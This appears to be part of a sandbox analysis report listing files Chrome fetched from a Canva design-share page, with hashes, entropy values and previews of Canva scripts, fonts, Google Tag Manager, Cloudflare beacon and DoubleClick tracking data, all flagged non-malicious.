                                                                                                                                                                                                                                                    Preview:(()=>{"use strict";var e,r,t,n,s,f={},i={};function c(e){var r=i[e];if(void 0!==r)return r.exports;var t=i[e]={id:e,loaded:!1,exports:{}};return f[e].call(t.exports,t,t.exports,c),t.loaded=!0,t.exports}c.m=f,c.amdD=function(){throw new Error("define cannot be used indirect")},c.amdO={},e=[],c.O=(r,t,n,s)=>{if(!t){var f=1/0;for(l=0;l<e.length;l++){for(var[t,n,s]=e[l],i=!0,o=0;o<t.length;o++)if((!1&s||f>=s)&&Object.keys(c.O).every((e=>c.O[e](t[o]))))t.splice(o--,1);else if(i=!1,s<f)f=s;if(i){e.splice(l--,1);var a=n();if(void 0!==a)r=a}}return r}else{s=s||0;for(var l=e.length;l>0&&e[l-1][2]>s;l--)e[l]=e[l-1];e[l]=[t,n,s]}},c.n=e=>{var r=e&&e.__esModule?()=>e.default:()=>e;return c.d(r,{a:r}),r},t=Object.getPrototypeOf?e=>Object.getPrototypeOf(e):e=>e.__proto__,c.t=function(e,n){if(1&n)e=this(e);if(8&n)return e;if("object"==typeof e&&e){if(4&n&&e.__esModule)return e;if(16&n&&"function"==typeof e.then)return e}var s=Object.create(null);c.r(s);var f={};r=r||[null,t({}),t([]),t(t)];for(var i=
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1581)
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):11354
                                                                                                                                                                                                                                                    Entropy (8bit):5.56153050425984
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:gQdJBEtxmqex0GygMrU2ePKgnYICPb3ReLWSrwL7PdYW8ZKAwhT5T2U88qmn79G1:gQdJBEtI0GFh2ePmFrMXrw/lMoAqT5TW
                                                                                                                                                                                                                                                    MD5:A5CBEFA28174BDEA24CCA2D8CC328244
                                                                                                                                                                                                                                                    SHA1:1F246F3718330E8395C4D62FF581FCBF10AB56C1
                                                                                                                                                                                                                                                    SHA-256:76A289AB009F7348AAC8AE32A595036AB6DFCAC77E844DCF4967F689636F61A6
                                                                                                                                                                                                                                                    SHA-512:F75508ED591CFC836C837631FB0CE9A6DBAB58ACD17CAA8781CCC4DD0724C9C98BBE6461D7F57F51E0DE70FC183F53F04B2FEFCECDF17EC8680C2A9FB91C2F43
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[8919],{../***/ 653425:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_req__(153325);self._fe4d99ebe0d2d259646a80d250150d47 = self._fe4d99ebe0d2d259646a80d250150d47 || {};(function(__c) {var H1;var C1,teb,D1,ueb,E1,web,veb,xeb,F1,G1,zeb,I1;C1=function(a){const b={};for(const c of Object.keys(a)){const d=a[c];b[c]=d instanceof Object?JSON.stringify(d):d}console.table(b);console.log("View non-truncated properties:");console.dir(a)};.teb=function(a){var b;const c=[],d=e=>{var f,g;c.push(...e.G);e.To&&c.push(...e.To);e.$i&&c.push(...e.$i);e.qq&&c.push(...e.qq);null===(f=e.Cq)||void 0===f?void 0:f.forEach(h=>c.push(...h));null===(g=e.Df)||void 0===g?void 0:g.forEach(h=>c.push(...h))};d(a);a.children&&a.children.forEach(e=>d(e));null===(b=a.Xp)||void 0===b?void 0:b.forEach(e=>c.push(...e));return c};D1=function(
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (3922)
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):17168
                                                                                                                                                                                                                                                    Entropy (8bit):5.681193136051718
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:RRJ8bUu3/OfhCZAKA/ZtDiPlvDqoxFxkR/X/l2DUK8G7+2Zmgf/3+s2A:Rp6/OfhCOrDi9brwR/dbK8Pgf/3+K
                                                                                                                                                                                                                                                    MD5:877FA88BFB6FE3A883ACE013E852F98C
                                                                                                                                                                                                                                                    SHA1:DC8D514AB4C602EC01BE5DD594B4095F8E6B4563
                                                                                                                                                                                                                                                    SHA-256:D0D29E3CF523987084CAD977662B11C5B2205B798298A25A9BBF4D513A68386A
                                                                                                                                                                                                                                                    SHA-512:C087281FF18AF9F9A52DFC3056F24B337B3B44E660AC71DC3D8F47B13602BDBC56F851A3FB77B5E9AC76E6E82A701AD59420D14727D21713780AF768C2E8ED73
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/dd1f23ecb46acb13.js
                                                                                                                                                                                                                                                    Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[495],{../***/ 665054:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_req__(577033);self._fe4d99ebe0d2d259646a80d250150d47 = self._fe4d99ebe0d2d259646a80d250150d47 || {};(function(__c) {var B=__c.B;var L=__c.L;.var Ozb=function(a,b){class c{static B(d){L(d,{Ud:V6,m0:V6})}get Ud(){switch(this.m0){case "date":return new Kzb(this.Lt,b.language||"en-AU");case "select":return new Lzb(this.Lt);case "mention":return new Mzb(this.Lt);case "plain_number":case "currency":case "percentage":case void 0:break;default:throw new B(this.m0);}}get m0(){var d;return null===(d=this.Lt.Yt)||void 0===d?void 0:d.type}constructor(d){c.B(this);this.context=d;this.Lt=__c.A(a.Lw(d.sheet,d.ba,d.col))}}return Nzb(d=>(new c(d)).Ud)},.Pzb=function(a){var b=["rgb(255, 255, 255)","rgb(13, 18, 22)"];try{const c=__c.Cy(a),d=c instanceof __
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 194064, version 1.15139
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):194064
                                                                                                                                                                                                                                                    Entropy (8bit):7.998661074705099
                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                    SSDEEP:3072:lWA1E2IS4CGxdgapuE7L/qeXwjxseq5IGxjgF3udAjWJp2r8YvVkhsHZUTV8KBfC:l1rIS4CG2EPPwjxsScjgF3ud5u6hsHZh
                                                                                                                                                                                                                                                    MD5:BD9B0E8C9F27308A42500F46CAB0BA15
                                                                                                                                                                                                                                                    SHA1:CE426E13C100DC1D6C293CD3A121FA195763F32B
                                                                                                                                                                                                                                                    SHA-256:AA9B3D1241D650C7EEBE80B8A9D73450A685CAD1942A4CEC9C754A76CE716F1F
                                                                                                                                                                                                                                                    SHA-512:C0B149E584B4E527AB79F1641147B8D99640043DD7F6D5ADA34BDDF49EF2A5D319DF0822B3A67BA32B36B4C412CB99B99C40DF9D396D51B39ECDB258501DC4EB
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    URL:https://font-public.canva.com/YACgEZ1cb1Q/0/ArimoBold.927b7dca5b947f69cb8e835f7f743d.98c4d2c0223fc8474641c77f923528e9.woff2
                                                                                                                                                                                                                                                    Preview:wOF2......................;#......................j......J....`...........4....F...(.6.$..\..Z..d. ..K...u...[.......o...H...n.C%q`..5.5......P.o.C.#.@]........B.T.[..9..{iVA.!.V{.S.H...................m:3.}3.w.%.D@EP@Q..h<....\.i...<iJ...Y^...(.mSf...k..P....iu.U..w..@].{=.}v@.C.4r..(c..(%m...".....4*.d49.9e~*..H#....E..Mx6.t>SW....4...J..Q........;@ .^.L0P........}3e...0.+2.<...:..j.q...2gJWX...&..x....|...4?\................J.;..y..^|{.i.:..e....z..a..X< H.....Mxl..=..:.."..D..U...|l7..{ES.{.2<U....=YF %..rS...S...U..i,....O..<...Xz."....!~f_6..'..lz....).. O...".~{S.T...z{[1..|N.p.7..p.,p.......1...d......v.jK....:[{:c^l.H.i.'y.c.|..P.3w~....(...'q..N|.P.......x.^...R.....Y............>..;:.....|...&.^.....L....k-...T;...-'.2R:a.0...s.,.<,.x`9...F.d.;...(..I...n.....o.*...J...0_...}vLG...yd....I..P..r..a...k...xN.yo.......>z.M.8.q#4.X)S0.iuJ)m.u.Q.@...s.[..)(.I.T....|.\.G\wg.....2wo..J!..F..ow.q*....O..CA.i-.z...'..........3k...e.........3.
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (961)
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):4342
                                                                                                                                                                                                                                                    Entropy (8bit):5.6517263885160025
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:/8TJjT0vw3F8mBC7bGxsRgTs1aiq65uYf47AuMA2y:/8TJcvEF3C2xsRx1aifPi2y
                                                                                                                                                                                                                                                    MD5:09B8A90F25C53311A2C0D17023A001B7
                                                                                                                                                                                                                                                    SHA1:7D8078C095461AE252E46C5D7ECF57BF2CD1366A
                                                                                                                                                                                                                                                    SHA-256:8441A93D7CE291E8F9D976B81EDC975A327ADC21F7A1FA6384A293A6DF086B9D
                                                                                                                                                                                                                                                    SHA-512:389B39591B6663900D6C6236CE651E64AB0585C9FF095CD6071B3966B450FA256ADF5FC7C6601E09C2B4829C7089A06AE6AEDA4D467DF846AFFFE787049D1204
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/a69e6dc612146c74.js
                                                                                                                                                                                                                                                    Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[5769],{../***/ 732219:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_req__(653425);self._fe4d99ebe0d2d259646a80d250150d47 = self._fe4d99ebe0d2d259646a80d250150d47 || {};(function(__c) {var Ga=__c.Ga;.var Bqb=function(a,b,c,d){const e=async f=>{var g;if(null===(g=b.wq)||void 0===g?0:g.id)clearTimeout(b.wq.id),b.wq=void 0;d.Ph("handle_scheduled_view_duration");return zqb(a,b,{...f,lq:c,ad:d})};return{CJa:e,DJa:async()=>{if(0===b.state.type){var f=await e(b.state);if(!f.ok)switch(f.error){case "RECORD_HEARTBEAT_ERROR":case "ABOVE_IDLE_THRESHOLD":case "SUSPECTED_SLEEP":case "INVALID_INTERACTION_TIMESTAMP":return a.T4(b);case "LESS_THAN_MINIMUM_DURATION_THRESHOLD":return 0!==b.state.type?void 0:H3(a,.b);default:throw new __c.B(f.error);}0===b.state.type&&(f.value.qLa?Aqb(a,b):H3(a,b))}}}},H3=function(a,b){__c
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2415)
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):22394
                                                                                                                                                                                                                                                    Entropy (8bit):5.43398653378245
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:/nJ+fGMjzTE2KzVBDq4eB8+dLzgTKb5IxrzhNQDvkH8zdo8SGerbsKl5NdrNgSm9:/cfGMXA2I24eBH1HI5lNQTkAdo8SGerS
                                                                                                                                                                                                                                                    MD5:495C0AC6BD7BAC84D05D17CF85ABE15D
                                                                                                                                                                                                                                                    SHA1:A41D664EC4338CDB3BFBE46899772DDDEA3E9D80
                                                                                                                                                                                                                                                    SHA-256:AA5813304552E248B262F4152B3B7693D7EA48FF5A29C0BEDBEFD6338357D847
                                                                                                                                                                                                                                                    SHA-512:4A483AB8A04939944D6132ABF217B94B70BBFE026215DC16C8F4AB94E9E4CE6B18315D7DA299BB1D14CE268E72920373F695E77A3EA83C52FF53EC27D52DDB02
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[3349],{../***/ 577033:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._fe4d99ebe0d2d259646a80d250150d47 = self._fe4d99ebe0d2d259646a80d250150d47 || {};(function(__c) {var cy;var A=__c.A;var YY;var B=__c.B;var Ga=__c.Ga;var r8a,OY,PY,s8a,u8a,SY,x8a,w8a,y8a,z8a,A8a,TY,B8a,VY,D8a,G8a,H8a,J8a,K8a,ZY,O8a,P8a,M8a,aZ,L8a,F8a,N8a,E8a;__c.NY=function(a,b){return __c.aa[a]=b};r8a=function(a){return a instanceof Error?"QuotaExceededError"===a.name||a instanceof DOMException&&22===a.code||a instanceof q8a:!1};OY=function(a){const b=Error(a);return c=>{c instanceof Error&&(null==c.stack||""===c.stack)&&(c.stack=b.stack);return c}};.PY=function(a){return new Promise((b,c)=>{const d=()=>{a.removeEventListener("success",e);a.removeEventListener("error",g)},e=()=>{d();b(a.result)},f=OY("idb promisify_request_events error")
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (19948), with no line terminators
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):19948
                                                                                                                                                                                                                                                    Entropy (8bit):5.261902742187293
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:XriNpnjyMkg8XMtExRN1w29JIOzahXtO2nJ65:GijgSWuanfJ65
                                                                                                                                                                                                                                                    MD5:EC18AF6D41F6F278B6AED3BDABFFA7BC
                                                                                                                                                                                                                                                    SHA1:62C9E2CAB76B888829F3C5335E91C320B22329AE
                                                                                                                                                                                                                                                    SHA-256:8A18D13015336BC184819A5A768447462202EF3105EC511BF42ED8304A7ED94F
                                                                                                                                                                                                                                                    SHA-512:669B0E9A545057ACBDD3B4C8D1D2811EAF4C776F679DA1083E591FF38AE7684467ABACEF5AF3D4AABD9FB7C335692DBCA0DEF63DDAC2CD28D8E14E95680C3511
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    URL:https://static.cloudflareinsights.com/beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015
                                                                                                                                                                                                                                                    Preview:!function(){var e={343:function(e){"use strict";for(var t=[],n=0;n<256;++n)t[n]=(n+256).toString(16).substr(1);e.exports=function(e,n){var r=n||0,i=t;return[i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]]].join("")}},944:function(e){"use strict";var t="undefined"!=typeof crypto&&crypto.getRandomValues&&crypto.getRandomValues.bind(crypto)||"undefined"!=typeof msCrypto&&"function"==typeof window.msCrypto.getRandomValues&&msCrypto.getRandomValues.bind(msCrypto);if(t){var n=new Uint8Array(16);e.exports=function(){return t(n),n}}else{var r=new Array(16);e.exports=function(){for(var e,t=0;t<16;t++)0==(3&t)&&(e=4294967296*Math.random()),r[t]=e>>>((3&t)<<3)&255;return r}}},508:function(e,t,n){"use strict";var r=n(944),i=n(343);e.exports=function(e,t,n){var o=t&&n||0;"string"==typeof e&&(t="binary"===e?new Array(16):null,e=null);var a=(e=e||{}).random||(e.rng||r)();if(
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1395)
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2941
                                                                                                                                                                                                                                                    Entropy (8bit):5.531163299403657
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:ja8b31sG9tadwcqSJXICa731sG9tadwcqSJXIUu+mwcqSJXbk3QLRmaKcDCKPG9I:+8blcLTXm7lcLTXg+YTXg3i8pgCZG5
                                                                                                                                                                                                                                                    MD5:CFFC1724517E9F48583BC7508918A74B
                                                                                                                                                                                                                                                    SHA1:5DBAE409CAA19434332106B28A05D1F49FD745C3
                                                                                                                                                                                                                                                    SHA-256:0ABF1AD41A406C496AFE1FB876C0775A5025CCCC372CAF0874E1CA88DA5B1826
                                                                                                                                                                                                                                                    SHA-512:7FB47A3D5311A461C04FED6A28E982D3D3F7B1E0A5D827AB0E9F385B437C46B76A4C487505652FCCB75F2194167031B2BB3360BAC7642CA16566B9E1AF4DB831
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Preview:event: message.data: {"send_pixel":["https://ad.doubleclick.net/activity;register_conversion=1;src=9812343;type=conve0;cat=canva008;ord=1436255686;gtm=45j91e4c50v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u6=US;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;tag_exp=101925629~102067555~102067808~102081485~102198178;ps=1;pcor=123090588;s3p=1;~oref=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a?"],"options":{"attribution_reporting":true}}..event: message.data: {"send_pixel":["https://ad.doubleclick.net/activity;src=9812343;type=conve0;cat=canva008;ord=1436255686;gtm=45j91e4c50v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u6=US;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (50697)
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):370428
                                                                                                                                                                                                                                                    Entropy (8bit):5.545585696505767
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6144:Z5mgYmBsJ2dYns9Q3Z1HcRCrfa0Mf3/5Mw9:ZQgYm8299u7Hc8y
                                                                                                                                                                                                                                                    MD5:0123AE54C1E98F2AED6CEF358CCA9C74
                                                                                                                                                                                                                                                    SHA1:13370ACCC32D0864CA4D6E767064256DDBCA96E2
                                                                                                                                                                                                                                                    SHA-256:50178C74E36A5A41D04CFD9C5ED396671102DA4BBAFAABEFB59E2D4552FEE3B2
                                                                                                                                                                                                                                                    SHA-512:D8E467936E07A87DCD6877AB8E63F6BF2741CA252C2DB0D88533E405478366D3A9BB3D50737843CE07098FBA9C189673C808E75C332250F1FE064ED3331772DB
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"297",. . "macros":[{"function":"__e"},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__f","vtp_component":"URL"},{"function":"__u","vtp_component":"PATH","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"label"},{"function":"__r"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"form_content"},{"function":"__c","vtp_value":"844585682227065"},{"function":"__cvt_12729902_717"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"product_variant"},{"function":"__v","convert_case_to":1,"vtp_dataLayerVersion":2,"vtp_setDefaultValue":fa
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 41456, version 1.0
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):41456
                                                                                                                                                                                                                                                    Entropy (8bit):7.994664217432325
                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                    SSDEEP:768:EA6CYSTwaih5Mbei2P6ZEnwmnjRGfL4p/V0qA1E89qja7IcCXKui14zmp/llqu:EGYSUaiLCei2PgEnwoALiN0qA1E82afL
                                                                                                                                                                                                                                                    MD5:4971EDF7A4A0359F252D44D4647AA2C2
                                                                                                                                                                                                                                                    SHA1:B7A585910ED4AF3810783F842AA0E39274B76396
                                                                                                                                                                                                                                                    SHA-256:66C862243067D2ED17D8881A57F8593E0DD35A7488BABB3B3335111A5D1E3591
                                                                                                                                                                                                                                                    SHA-512:F7C69269D0636B08807B86F716A6D245CC4AD69A91C192208463F7ADB9C6950FEDB43A9EA0C77F1440C6787106B9E395BFD08EE0F5DA983BB29DFC60FAFEAC59
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    URL:https://font-public.canva.com/YAFdJjTk5UU/0/CanvaSans-Bold13644182954117137290.33696.33696a29f45c1b554a4c12443b998d21.woff2
                                                                                                                                                                                                                                                    Preview:wOF2..............................................D..D....`..n..............u..>..6.$..:. ..O..{..K[>.q.u.:+....PY.\o..0........o...pT1v2.[Q.l........$...m....(j.jZU... . .}..&.X....<.-;S*.y?.V.-r....&...w.Hol......g...C3.../:....7.W...k..m......P...e.sV...F.r...v;D H..,.B.#H.F,.....M..`..]...h}p.....lrr.]ym._...3..,.B.../D.....".1..wm4.......,..........z....=.......k{..F.c........W.dg...2..[.F.u../T.._..|{!......n..{w..$$.B......Z}.....+.|U._.|.`. ..........;"vP,.....x.YwYege.....m.s.....gfdef'.....XJm..1Ec.....3s.{..(R1.T...[B..y......\...g...].....?..F.I...x..."Oq?../...{Z.3..iZ'.3..|...G....04~......M.%...'D..)L.~.~<.Tt$.B|.j..-];IQ.)....2lH{`....[_.......lbN...v.M!\......]U.....8....G.B\..;O....:......\..:|..B>.:..Ozb....X2.@1.q...9.Y...-...5Y8...?...OD.s..........c..}j..-....\..[a..MU.B".@.@A.r..FC2+f9..@dseZ.tl....A....\..w..B.2y........S.h.$O.$k.At*.ai..%.G\{.]..H...I .qbh...8._.q.......s.....v.]..9a.....~*{}v,..9..mop......".\
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):354
                                                                                                                                                                                                                                                    Entropy (8bit):5.6762578005096325
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:YkHKKF7r48evSQNWKtI3s0ud9lbpYhF81ExPA6WrGbfm4XCE2p64phvxg7h+7uH1:YkqmXnwScWKwwlF+F81ExPA3Cmamp62S
                                                                                                                                                                                                                                                    MD5:B4F9F0DD587C5ABE6708F44A6E11A53F
                                                                                                                                                                                                                                                    SHA1:28EBFA68F92AE2A96354521FFAD38A3DBE647154
                                                                                                                                                                                                                                                    SHA-256:CCC37C837397D66FD8E0FACFE001CE7FC9F87E48089D73540AD2C2DD95716D04
                                                                                                                                                                                                                                                    SHA-512:D471D889D8EAE3E9190B39376C29400D5AB9BF3C47897B64DC278E4E58314A78F148A44BB315D51591CA5384EAE505AD411BEF7AA706FDD5678023109A809425
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Preview:{"pixelJwt": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJwaXhlbCBjb25maWciLCJuYW1lIjoiQ2FudmEgSW5jLiIsImlzcyI6Im1ldGFkYXRhIGluYy4iLCJhdWQiOiIxNzIxIiwiZXhwIjoxNzY3MTE5NDAwLCJpYXQiOjE3MjExMzcxMDYsIm5iZiI6MTcxOTc3MjIwMCwiY29sbGVjdEluc2lnaHRzIjowLCJwYWNrYWdlIjoiRlVMTF9GVU5DVElPTkFMSVRZIiwiaXNfcGxnIjoiMCJ9.wMldEMSftyWmTu8VELd7xI0gDpqzWR64-SlbjetKBO8"}.
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (50697)
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):370411
                                                                                                                                                                                                                                                    Entropy (8bit):5.54548277507221
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6144:Z5mgYmBsJ2dYns9QGZ1HcRCrfa0Mf3/5Mw9:ZQgYm8299J7Hc8y
                                                                                                                                                                                                                                                    MD5:16BF4B25F88F46F534BF8F1A73EC6333
                                                                                                                                                                                                                                                    SHA1:5D1E6332EF204DC9E62ED854DAC4414633CEF988
                                                                                                                                                                                                                                                    SHA-256:382FFD835B42BD03466BB329FA0FEC3DED5AC8BAD83D146140990FCF47A75765
                                                                                                                                                                                                                                                    SHA-512:1F0D4C7DFF0FDC5BD70523D79F2087D1BC39413EA7FA20BC838B1433DB60DA96338885452CCAD37F98255D078AFE55B306903737F7EE7C783E4D547B4C6B0E7E
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    URL:https://www.googletagmanager.com/gtm.js?id=GTM-TZPTKRR&l=dataLayer
                                                                                                                                                                                                                                                    Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"297",. . "macros":[{"function":"__e"},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__f","vtp_component":"URL"},{"function":"__u","vtp_component":"PATH","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"label"},{"function":"__r"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"form_content"},{"function":"__c","vtp_value":"844585682227065"},{"function":"__cvt_12729902_717"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"product_variant"},{"function":"__v","convert_case_to":1,"vtp_dataLayerVersion":2,"vtp_setDefaultValue":fa
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65455)
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):205707
                                                                                                                                                                                                                                                    Entropy (8bit):5.28145887499295
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3072:eRYYsuOFvB+ZC2oheW9E4QCuXU+inBcqLRjPV:NFvB+E2fWa4QlE3BzVV
                                                                                                                                                                                                                                                    MD5:2A1F2D039CB106B389C63AA919CB4DB8
                                                                                                                                                                                                                                                    SHA1:4573C91E494C3F4FDFD63D9746DF8D09ABB72BCA
                                                                                                                                                                                                                                                    SHA-256:21970317BF4C176087640D7E46BBEB1C59B5C2BFB67AFCB392F3FF1E790DEAE5
                                                                                                                                                                                                                                                    SHA-512:C2ABFC64A41B0BB2F0E2202E624A6EA02452699BBB91E684A85B59CC6CA0D2BA44F5537549BDF71F875B178F1531F55BB92A05235464EA882929DB95A7BB612D
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/76d8b06612b94585.vendor.js
